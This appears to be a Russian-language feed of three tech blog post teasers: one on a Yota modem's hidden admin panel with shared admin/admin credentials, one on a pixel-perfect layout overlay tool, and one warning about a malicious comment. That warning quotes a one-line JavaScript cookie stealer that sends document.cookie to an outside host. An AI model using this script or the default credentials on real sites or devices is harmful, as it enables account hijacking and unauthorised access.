• Yota Egg: Уязвимость или фича?

      Знали ли вы, что в Яйце от Yota есть скрытый («неупомянутый в мануале», «неизвестный 99% пользователей» — кому как больше нравится) административный интерфейс, который позволяет более тонко настраивать это устройство и смотреть подробную статистику?

      А знали ли вы, что доступ к нему закрыт одинаковой для всех устройств парой логин/пароль admin/admin?

      Читать дальше →
    • Верстаем пиксел в пиксел: кроссбраузерный аналог PixelPerfect

        Нет, с твоим монитором всё в порядке, %username%
        Довольно часто некоторые заказчики, отдавая макет сайта на вёрстку, требуют попиксельно достоверной точности в разметке во всех браузерах.

        Проверить такое соответствие достаточно легко — нужно сделать скриншот сайта и совместить его с графическим макетом, например, в Photoshop'е.

        Но вот только в процессе вёрстки использовать такой приём не очень удобно.

        Что же делать трудяге-верстальщику?
      • Внимание, воровство cookies!

          В недавно опубликованном посте Однокласникис.инфо (не кликай, пока не дочитаешь) хабраюзер grg391 запостил комментарий со вложенным javascript'ом:

          хабрахабр опасносте

          Из-за этого комментария все комментарии после него не отображаются.

          Содержание скрипта «bestrussianporn.ru/s.js»:
          img = new Image(); img.src = "http://s.netsec.ru/gojas.gif?"+document.cookie;
          Т. е. это sniffer ваших cookies, будьте осторожны, если вы при авторизации отмечали чекбокс «не привязыватьтся к IP-адресу» злоумышленник может завладеть вашим аккаунтом.

          Рекомендуется сменить пароль.